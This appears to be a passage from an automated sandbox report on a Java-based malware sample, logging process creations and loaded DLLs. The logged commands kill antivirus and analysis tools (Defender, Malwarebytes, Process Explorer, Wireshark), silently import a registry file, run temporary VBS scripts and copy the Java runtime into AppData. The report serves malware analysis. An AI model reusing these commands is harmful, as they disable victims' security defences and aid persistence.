        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:ListJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.regJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /FJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbsJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /eJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbsJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: opengl32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: glu32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
